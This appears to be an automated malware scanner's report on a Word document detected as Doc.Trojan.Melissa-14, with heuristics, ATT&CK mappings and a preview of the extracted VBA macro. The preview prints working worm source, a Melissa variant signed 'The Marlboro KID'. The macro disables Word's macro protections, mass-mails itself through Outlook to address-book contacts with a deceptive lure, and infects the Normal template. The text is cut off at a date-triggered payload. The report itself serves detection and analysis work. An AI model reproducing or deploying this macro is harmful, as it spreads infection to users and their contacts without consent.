MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection 'Doc.Trojan.Melissa-14' strongly indicates the Melissa family. The VBA macro explicitly uses 'CreateObject("Outlook.Application")' and iterates through the address book to send copies of itself, a hallmark of the Melissa virus. The macro also attempts to disable security settings and execute itself via the Document_Open subroutine.
Heuristics 5
-
ClamAV: Doc.Trojan.Melissa-14 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Melissa-14
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17011 bytes |
SHA-256: d4237130555857d80f42731f3d9d563bca7ae7cc1bf80374ee2b1ddc17546695 |
|||
|
Detection
ClamAV:
Doc.Trojan.Melissa-14
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jane"
Attribute VB_Base = "1Normal.Jane"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Private Sub Document_Close()
On Error Resume Next
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'JANE! by The Marlboro KID (Killer In Descise)
'It's Inpired clearly by Melissa but the Infection bit is all mine
'Payload part is also by me...of course
'Use it, Loose it, Enjoy ha ha ha.....
'Not ment to make any greater harm....just for the hell of it..
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
regcheck = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
If System.PrivateProfileString("", regcheck + "9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", regcheck + "9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1)
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
End If
Dim v1, v2, v3
Set v1 = CreateObject("Outlook.Application")
Set v2 = v1.GetNameSpace("MAPI")
RegAdd = "...made by 'The Marlboro KID'..."
If System.PrivateProfileString("", regcheck, "Jane!") <> RegAdd Then
If v1 = "Outlook" Then
v2.Logon "profile", "password"
For y = 1 To v2.AddressLists.Count
Set AddyBook = v2.AddressLists(y)
x = 1
Set v3 = v1.CreateItem(0)
For CountIt = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
v3.Recipients.Add Peep
x = x + 1
If x > 78 Then CountIt = AddyBook.AddressEntries.Count
Next CountIt
subj = "Is this the right E-mail address..?"
v3.Subject = subj & Application.UserName
Mezz = "Dont know if i sent this to the right E-mail,"
Mezz = Mezz + "if this isn't ment for you please dont look"
Mezz = Mezz + "at the attachments, its a private file.."
Mezz = Mezz + "ThanX ... //"
v3.Body = Mezz & Application.UserName
v3.Attachments.Add ActiveDocument.FullName
v3.Send
Peep = ""
Next y
v2.Logoff
End If
System.PrivateProfileString("", regcheck, "Jane!") = RegAdd
End If
Set ActivDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NrmTmpl = NormalTemplate.VBProject.VBComponents.Item(1)
ADCountLn = ActivDoc.CodeModule.CountOfLines
NTCountLn = NrmTmpl.CodeModule.CountOfLines
If ActivDoc.Name = "Jane" And NrmTmpl.Name = "Jane" Then GoTo THISISTHEENDMYFRIEND
If ActiveDoc.Name <> "Jane" Then
ActivDoc.Name = "Jane"
Set Dest = ActivDoc
Set Source = NrmTmpl
End If
Dim Replace
If NrmTmpl.Name <> "Jane" Then
NrmTmpl.Name = "Jane"
Replace = True
Set Dest = NrmTmpl
Set Source = ActivDoc
End If
Dim FirstName, LastName, TotalName As String
Randomize
C1 = Int((9999 - 1 + 1) * Rnd + 1)
C2 = Int((999 - 1 + 1) * Rnd + 1)
C3 = C1 * C2
If C3 < 99000000 Then
C3 = C3 + 18900000
End If
FirstName = CStr(C3)
C1 = Int((9 - 1 + 1) * Rnd + 1)
C2 = Int((99 - 1 + 1) * Rnd + 1)
C3 = C1 * C2
If C3 < 900 Then
C3 = C3 + 101
End If
LastName = CStr(C3)
TotalName = "c:\" + FirstName + "." + LastName
If Dir(TotalName) = TotalName Then
Kill (TotalName)
End If
Open TotalName For Output As #1
If Replace = True Then
Print #1, "Private Sub Document_Close()"
Else
Print #1, "Private Sub Document_Open()"
End If
For CountIt = 1 To Source.CodeModule.CountOfLines - 1
Print #1, Source.CodeModule.Lines(CountIt + 1, 1)
Next
Close #1
Dest.CodeModule.AddFromFile TotalName
Kill (TotalName)
THISISTHEENDMYFRIEND:
doc = "Document"
If NTCountLn <> 0 And ADCountLn = 0 And (InStr(1, ActiveDocument.Name, doc) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
If Day(Now) = 13 And WeekDay(Now)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.